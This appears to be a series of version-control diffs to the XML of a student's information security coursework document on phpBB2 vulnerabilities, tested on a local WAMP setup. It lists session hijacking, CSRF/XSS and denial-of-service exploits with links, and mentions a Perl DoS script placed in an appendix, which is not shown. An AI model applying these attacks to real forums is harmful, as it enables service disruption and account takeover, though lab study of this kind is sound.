+      <w:bookmarkStart w:id="4" w:name="_Toc445123124"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Penetration/Attack</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="4"/>
     </w:p>
     <w:p>
@@ -1703,46 +1753,30 @@
           <w:lang w:val="en"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc445123124"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc445123125"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
-        <w:t>Penetration/Attack</w:t>
+        <w:t>Install back doors</w:t>
       </w:r>
       <w:bookmarkEnd w:id="5"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc445123125"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Install back doors</w:t>
+      </w:pPr>
+      <w:bookmarkStart w:id="6" w:name="_Toc445123126"/>
+      <w:r>
+        <w:t>Covering Tracks</w:t>
       </w:r>
       <w:bookmarkEnd w:id="6"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc445123126"/>
-      <w:r>
-        <w:t>Covering Tracks</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="7"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -1768,7 +1802,7 @@
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc445123127"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc445123127"/>
       <w:r>
         <w:rPr>
           <w:color w:val="000000" w:themeColor="text1"/>
@@ -1776,7 +1810,7 @@
         <w:lastRenderedPageBreak/>
         <w:t>Conclusion</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="8"/>
+      <w:bookmarkEnd w:id="7"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -1840,9 +1874,72 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>References</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">PHPBB 2.0.19 exploits. Available at: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId12" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://www.intelligentexploit.com</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:bookmarkStart w:id="8" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="8"/>
+    </w:p>
+    <w:p>
+      <w:hyperlink r:id="rId13" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://threatpost.com/new-exploits-arrive-for-old-php-vulnerability/104881/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>Appendix</w:t>
+      </w:r>
+    </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId12"/>
-      <w:footerReference w:type="default" r:id="rId13"/>
+      <w:headerReference w:type="default" r:id="rId14"/>
+      <w:footerReference w:type="default" r:id="rId15"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
       <w:pgNumType w:start="0"/>
@@ -1919,7 +2016,7 @@
           <w:rPr>
             <w:noProof/>
           </w:rPr>
-          <w:t>3</w:t>
+          <w:t>2</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -2016,7 +2113,7 @@
         <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri" w:cstheme="minorBidi" w:hint="default"/>
       </w:rPr>
     </w:lvl>
-    <w:lvl w:ilvl="1" w:tplc="08090003" w:tentative="1">
+    <w:lvl w:ilvl="1" w:tplc="08090003">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="o"/>
@@ -3984,7 +4081,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{5A887261-F2C6-4488-AF17-C4E16D166EB7}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{950535BD-2FA6-47E1-923F-41154CC4EBB7}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Modules/Information Security/Coursework/docs/Information_Security_Coursework_xw009807.docx
+++ b/Modules/Information Security/Coursework/docs/Information_Security_Coursework_xw009807.docx
@@ -1313,10 +1313,28 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>The version of WAMP server used in this assignment is WAMP5 1.7.0. The main version of PHPBB focused on in this investigation is phpBB2-2.0.23 although other versions have also been explored.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> A forum has been set up to practice and execute these vulnerabilities.</w:t>
+        <w:t>The version of WAMP server used in this assignment is WAMP5 1.7.0. The main version of PHPBB focused on in this investigation is phpBB2-2.0.23 although</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> vulnerabilities of</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> other versions have also been explored.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> A </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">PHP </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">forum has been set up to practice and </w:t>
+      </w:r>
+      <w:r>
+        <w:t>test</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> these vulnerabilities.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1509,14 +1527,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="8"/>
@@ -1529,145 +1539,45 @@
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
-        <w:t xml:space="preserve">Session Hijacking exploit - </w:t>
+        <w:t>An analysis of the forum was carried using who.is</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. This </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>delivered details of DNS and IP address details.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Other details such as security updates and software version expiry</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dates</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:hyperlink r:id="rId9" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:lang w:val="en"/>
-          </w:rPr>
-          <w:t>https://cxsecurity.com/issue/WLB-2009090082</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">The </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>possibility</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> of the attacker carrying out CSRF</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">(Cross Site Request Forgery) and gaining control of admin </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>functionality</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>PhpBB 2.0.19 Cross Site Request Forgeries and XSS Admin</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>An analysis of the forum was carried using who.is</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. This </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>delivered details of DNS and IP address details.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Other details such as security updates and software version expiry.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId10" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1698,8 +1608,31 @@
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
+        <w:t xml:space="preserve">Session Hijacking exploit - </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId10" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:val="en"/>
+          </w:rPr>
+          <w:t>https://cxsecurity.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:val="en"/>
+          </w:rPr>
+          <w:t>c</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:val="en"/>
+          </w:rPr>
+          <w:t>om/issue/WLB-2009090082</w:t>
+        </w:r>
+      </w:hyperlink>
       <w:r>
         <w:rPr>
           <w:lang w:val="en"/>
@@ -1709,6 +1642,106 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>The possibility of the attacker carrying out CSRF (Cross Site Request Forgery) and gaining control of admin functionality.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>PhpBB 2.0.19 Cross Site Request Forgeries and XSS Admin</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId11" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:val="en"/>
+          </w:rPr>
+          <w:t>http://joshduck.com/blog/2008/04/05/securing-your-php-code-xss/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="3" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="3"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">DOS (Denial of Service attack), </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>phpBB 2.0.19</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> search.php and profile.php DOS Vulnerability.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
@@ -1721,14 +1754,14 @@
           <w:lang w:val="en"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc445123123"/>
+      <w:bookmarkStart w:id="4" w:name="_Toc445123123"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
         <w:t>Enumeration</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="3"/>
+      <w:bookmarkEnd w:id="4"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1737,14 +1770,181 @@
           <w:lang w:val="en"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc445123124"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc445123124"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
         <w:t>Penetration/Attack</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="4"/>
+      <w:bookmarkEnd w:id="5"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>DOS (Denial of Service Attack)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">phpBB versions effected: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>phpBB_2.0.19 and below</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Vulnerability:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>This exploit exhausts the user registration functionality of the site and performing malformed search queries.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Methods of execution:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Refer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">nced in the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Appendix of this report is a Perl script to perform the method of attack discussed above</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1753,14 +1953,14 @@
           <w:lang w:val="en"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc445123125"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc445123125"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
         <w:t>Install back doors</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="5"/>
+      <w:bookmarkEnd w:id="6"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en"/>
@@ -1772,11 +1972,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc445123126"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc445123126"/>
       <w:r>
         <w:t>Covering Tracks</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="6"/>
+      <w:bookmarkEnd w:id="7"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -1802,7 +2002,7 @@
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc445123127"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc445123127"/>
       <w:r>
         <w:rPr>
           <w:color w:val="000000" w:themeColor="text1"/>
@@ -1810,7 +2010,7 @@
         <w:lastRenderedPageBreak/>
         <w:t>Conclusion</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="7"/>
+      <w:bookmarkEnd w:id="8"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -1862,7 +2062,7 @@
       <w:r>
         <w:t xml:space="preserve">Any version of phpBB2.x security can be exploited by a CRSF (Cross-site request forgery) attack. Looked this up briefly </w:t>
       </w:r>
-      <w:hyperlink r:id="rId11" w:history="1">
+      <w:hyperlink r:id="rId12" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1894,7 +2094,7 @@
       <w:r>
         <w:t xml:space="preserve">PHPBB 2.0.19 exploits. Available at: </w:t>
       </w:r>
-      <w:hyperlink r:id="rId12" w:history="1">
+      <w:hyperlink r:id="rId13" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1906,12 +2106,9 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:bookmarkStart w:id="8" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="8"/>
-    </w:p>
-    <w:p>
-      <w:hyperlink r:id="rId13" w:history="1">
+    <w:p/>
+    <w:p>
+      <w:hyperlink r:id="rId14" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1938,8 +2135,8 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId14"/>
-      <w:footerReference w:type="default" r:id="rId15"/>
+      <w:headerReference w:type="default" r:id="rId15"/>
+      <w:footerReference w:type="default" r:id="rId16"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
       <w:pgNumType w:start="0"/>
@@ -2016,7 +2213,7 @@
           <w:rPr>
             <w:noProof/>
           </w:rPr>
-          <w:t>2</w:t>
+          <w:t>4</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -3793,6 +3990,18 @@
       <w:ind w:left="220"/>
     </w:pPr>
   </w:style>
+  <w:style w:type="character" w:styleId="FollowedHyperlink">
+    <w:name w:val="FollowedHyperlink"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="004A6C91"/>
+    <w:rPr>
+      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
@@ -4081,7 +4290,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{950535BD-2FA6-47E1-923F-41154CC4EBB7}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{357B696A-B5C7-48D0-A4E1-0432D1779C67}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Modules/Information Security/Coursework/docs/Information_Security_Coursework_xw009807.docx
+++ b/Modules/Information Security/Coursework/docs/Information_Security_Coursework_xw009807.docx
@@ -47,13 +47,13 @@
                   <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                     <wp:simplePos x="0" y="0"/>
                     <wp:positionH relativeFrom="page">
-                      <wp:align>center</wp:align>
+                      <wp:posOffset>219075</wp:posOffset>
                     </wp:positionH>
                     <wp:positionV relativeFrom="page">
-                      <wp:align>center</wp:align>
+                      <wp:posOffset>1209675</wp:posOffset>
                     </wp:positionV>
-                    <wp:extent cx="1712890" cy="3840480"/>
-                    <wp:effectExtent l="0" t="0" r="1270" b="0"/>
+                    <wp:extent cx="6781800" cy="6429375"/>
+                    <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                     <wp:wrapNone/>
                     <wp:docPr id="138" name="Text Box 138"/>
                     <wp:cNvGraphicFramePr/>
@@ -64,7 +64,7 @@
                           <wps:spPr>
                             <a:xfrm>
                               <a:off x="0" y="0"/>
-                              <a:ext cx="1712890" cy="3840480"/>
+                              <a:ext cx="6781800" cy="6429375"/>
                             </a:xfrm>
                             <a:prstGeom prst="rect">
                               <a:avLst/>
@@ -109,8 +109,8 @@
                                   <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
                                 </w:tblPr>
                                 <w:tblGrid>
-                                  <w:gridCol w:w="5748"/>
-                                  <w:gridCol w:w="5444"/>
+                                  <w:gridCol w:w="5480"/>
+                                  <w:gridCol w:w="5190"/>
                                 </w:tblGrid>
                                 <w:tr>
                                   <w:trPr>
@@ -160,7 +160,16 @@
                                               <w:sz w:val="72"/>
                                               <w:szCs w:val="72"/>
                                             </w:rPr>
-                                            <w:t>Information Security</w:t>
+                                            <w:t>Information S</w:t>
+                                          </w:r>
+                                          <w:r>
+                                            <w:rPr>
+                                              <w:caps/>
+                                              <w:color w:val="191919" w:themeColor="text1" w:themeTint="E6"/>
+                                              <w:sz w:val="72"/>
+                                              <w:szCs w:val="72"/>
+                                            </w:rPr>
+                                            <w:t>ecurity</w:t>
                                           </w:r>
                                         </w:p>
                                       </w:sdtContent>
@@ -355,10 +364,10 @@
                       </a:graphicData>
                     </a:graphic>
                     <wp14:sizeRelH relativeFrom="page">
-                      <wp14:pctWidth>94100</wp14:pctWidth>
+                      <wp14:pctWidth>0</wp14:pctWidth>
                     </wp14:sizeRelH>
                     <wp14:sizeRelV relativeFrom="page">
-                      <wp14:pctHeight>77300</wp14:pctHeight>
+                      <wp14:pctHeight>0</wp14:pctHeight>
                     </wp14:sizeRelV>
                   </wp:anchor>
                 </w:drawing>
@@ -369,7 +378,7 @@
                     <v:stroke joinstyle="miter"/>
                     <v:path gradientshapeok="t" o:connecttype="rect"/>
                   </v:shapetype>
-                  <v:shape id="Text Box 138" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:0;width:134.85pt;height:302.4pt;z-index:251659264;visibility:visible;mso-wrap-style:square;mso-width-percent:941;mso-height-percent:773;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:center;mso-position-horizontal-relative:page;mso-position-vertical:center;mso-position-vertical-relative:page;mso-width-percent:941;mso-height-percent:773;mso-width-relative:page;mso-height-relative:page;v-text-anchor:middle" o:gfxdata="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" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
